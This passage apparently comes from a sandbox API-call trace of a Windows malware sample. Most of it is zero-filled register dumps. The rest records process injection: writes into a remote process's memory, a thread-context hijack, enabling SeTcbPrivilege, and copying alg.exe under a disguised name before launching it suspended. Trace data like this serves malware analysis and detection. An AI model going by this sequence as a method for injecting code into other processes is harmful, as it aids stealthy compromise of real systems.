[274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0250.815] IsWow64Process (in: hProcess=0x410, Wow64Process=0x1f4fae0 | out: Wow64Process=0x1f4fae0) returned 1 [0250.815] WriteProcessMemory (in: hProcess=0x410, lpBaseAddress=0x400000, lpBuffer=0x1640000*, nSize=0x1f000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1640000*, lpNumberOfBytesWritten=0x0) returned 1 [0250.828] WriteProcessMemory (in: hProcess=0x410, lpBaseAddress=0x7ffde008, lpBuffer=0x1f4fae4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1f4fae4*, lpNumberOfBytesWritten=0x0) returned 1 [0250.828] WriteProcessMemory (in: hProcess=0x410, lpBaseAddress=0x7ffdf010, lpBuffer=0x1f4fae4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1f4fae4*, lpNumberOfBytesWritten=0x0) returned 1 [0250.828] SetThreadContext (hThread=0x3f0, lpContext=0x1f4f7f4*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x406aa2, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0250.829] ResumeThread (hThread=0x3f0) returned 0x1 [0250.829] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x493e0) returned 0x0 [0251.722] TerminateProcess (hProcess=0x410, uExitCode=0x0) returned 0 [0251.722] CloseHandle (hObject=0x410) returned 1 [0251.722] CloseHandle (hObject=0x3f0) returned 1 [0251.722] CloseHandle (hObject=0x0) returned 0 [0251.722] VirtualFree (lpAddress=0x1640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0251.723] GetCurrentProcess () returned 0xffffffff [0251.723] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1f4ff44 | out: Wow64Process=0x1f4ff44) returned 1 [0251.724] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000 [0251.726] WTSGetActiveConsoleSessionId () returned 0x1 [0251.726] GetCurrentProcess () returned 0xffffffff [0251.726] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1f4f89c | out: TokenHandle=0x1f4f89c*=0x3f0) returned 1 [0251.726] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x1f4f894 | out: lpLuid=0x1f4f894*(LowPart=0x7, HighPart=0)) returned 1 [0251.726] AdjustTokenPrivileges (in: TokenHandle=0x3f0, DisableAllPrivileges=0, NewState=0x1f4f884*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0251.727] GetLastError () returned 0x0 [0251.727] CloseHandle (hObject=0x3f0) returned 1 [0251.727] QueryUserToken () returned 0x0 [0251.727] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x1f4fb00 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0251.727] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\alg.exe" | out: lpString1="C:\\Windows\\system32\\alg.exe") returned="C:\\Windows\\system32\\alg.exe" [0251.727] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f4fd08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0251.727] lstrlenW (lpString="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned 38 [0251.727] lstrcpyW (in: lpString1=0x1f4fd4c, lpString2="a.exe" | out: lpString1="a.exe") returned="a.exe" [0251.727] Wow64DisableWow64FsRedirection (in: OldValue=0x1f4ff18 | out: OldValue=0x1f4ff18*=0x0) returned 1 [0251.727] CopyFileW (lpExistingFileName="C:\\Windows\\system32\\alg.exe" (normalized: "c:\\windows\\system32\\alg.exe"), lpNewFileName="C:\\Windows\\SysWOW64\\indexerneutrala.exe" (normalized: "c:\\windows\\syswow64\\indexerneutrala.exe"), bFailIfExists=0) returned 1 [0252.069] _snwprintf (in: _Dest=0x1f4f8f8, _Count=0x104, _Format="\"%s\" \"%s\"" | out: _Dest="\"C:\\Windows\\SysWOW64\\indexerneutrala.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"") returned 68 [0252.069] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutrala.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1f4f88c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1f4ff1c | out: lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutrala.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"", lpProcessInformation=0x1f4ff1c*(hProcess=0x478, hThread=0x3b0, dwProcessId=0x4ec, dwThreadId=0x2b8)) returned 1 [0252.082] NtQueryVirtualMemory (in: ProcessHandle=0x478, Address=0x140000000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x1f4f850, Length=0x30, ResultLength=0x0 | out: VirtualMemoryInformation=0x1f4f850*(BaseAddress=0x40000000, AllocationBase=0x1, AllocationProtect=0x0, RegionSize=0x0, State=0x0, Protect=0x0, Type=0xbd870000), ResultLength=0x0) returned 0x0 [0252.083] NtAllocateVirtualMemory (in: ProcessHandle=0x478, BaseAddress=0x1f4f8b8*=0x140000000, ZeroBits=0x0, RegionSize=0x1f4f8c0*=0x27000, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x1f4f8b8*=0x140000000, RegionSize=0x1f4f8c0*=0x27000) returned 0x0 [0252.083] NtGetContextThread (in: ThreadHandle=0x3b0, Context=0x1f4f380 | out: Context=0x1f4f380*(ContextFlags=0x0, Dr0=0x1f4f7d8, Dr1=0x2000, Dr2=0x0, Dr3=0x7754c72c, Dr6=0x0, Dr7=0x1f4f83c, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0xfd950000, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100002, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x2, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x27, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x20, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x1, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xec, [33]=0xf3, [34]=0xf4, [35]=0x1, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x70, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xac, [45]=0xf8, [46]=0xf4, [47]=0x1, [48]=0xa1, [49]=0xf8, [50]=0xf4, [51]=0x1, [52]=0x3, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x48, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x6, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x90, [73]=0xd6, [74]=0x37, [75]=0x70, [76]=0xf6, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x6fbff000, SegGs=0x7ff6, SegFs=0x0, SegEs=0x0, SegDs=0x6fbff000, Edi=0x7ff6, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x80, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x68, [69]=0x12, [70]=0x0, [71]=0x0, [72]=0x1, [73]=0x60, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x1, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x4f, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x1c, [145]=0xff, [146]=0xf4, [147]=0x1, [148]=0xf0, [149]=0x9e, [150]=0x5d, [151]=0x0, [152]=0x20, [153]=0xf6, [154]=0xf4, [155]=0x1, [156]=0x0, [157]=0x70, [158]=0x90, [159]=0x7f, [160]=0x0, [161]=0xe0, [162]=0xfd, [163]=0x7f, [164]=0x4e, [165]=0x0, [166]=0x50, [167]=0x0, [168]=0x50, [169]=0x1, [170]=0x52, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x10, [177]=0x4, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x1, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x48, [197]=0xf9, [198]=0xf4, [199]=0x1, [200]=0x4, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x3, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x50, [237]=0x1, [238]=0x52, [239]=0x0, [240]=0x3a, [241]=0xf0, [242]=0x52, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x9, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x48, [281]=0xf9, [282]=0xf4, [283]=0x1, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x53, [297]=0xa0, [298]=0x52, [299]=0x0, [300]=0x22, [301]=0x0, [302]=0xf4, [303]=0x1, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0xf0, [309]=0x3, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x4, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0xf8, [325]=0xf8, [326]=0xf4, [327]=0x1, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x58, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0xec, [345]=0xf7, [346]=0xf4, [347]=0x0, [348]=0x50, [349]=0x1, [350]=0x52, [351]=0x0, [352]=0x47, [353]=0x57, [354]=0xd7, [355]=0x0, [356]=0x4, [357]=0x4, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x4f, [379]=0x0, [380]=0x20, [381]=0xf7, [382]=0xf4, [383]=0x1, [384]=0x4a, [385]=0x25, [386]=0xd7, [387]=0x76, [388]=0x28, [389]=0x7c, [390]=0x53, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0xff, [397]=0xff, [398]=0xff, [399]=0xff, [400]=0x1f, [401]=0xa0, [402]=0x52, [403]=0xfe, [404]=0xb0, [405]=0xfd, [406]=0x4f, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x9b, [413]=0x25, [414]=0xd7, [415]=0x76, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x48, [425]=0xad, [426]=0x4f, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0xb5, [433]=0x46, [434]=0x34, [435]=0x7c, [436]=0x7b, [437]=0x4, [438]=0x0, [439]=0x0, [440]=0xb0, [441]=0x3, [442]=0x0, [443]=0x0, [444]=0xec, [445]=0x4, [446]=0x0, [447]=0x0, [448]=0xb8, [449]=0x2, [450]=0x0, [451]=0x0, [452]=0x4, [453]=0x4, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x84, [461]=0xad, [462]=0x4f, [463]=0x0, [464]=0x98, [465]=0x3d, [466]=0x52, [467]=0x0, [468]=0x40, [469]=0x0, [470]=0x0, [471]=0x0, 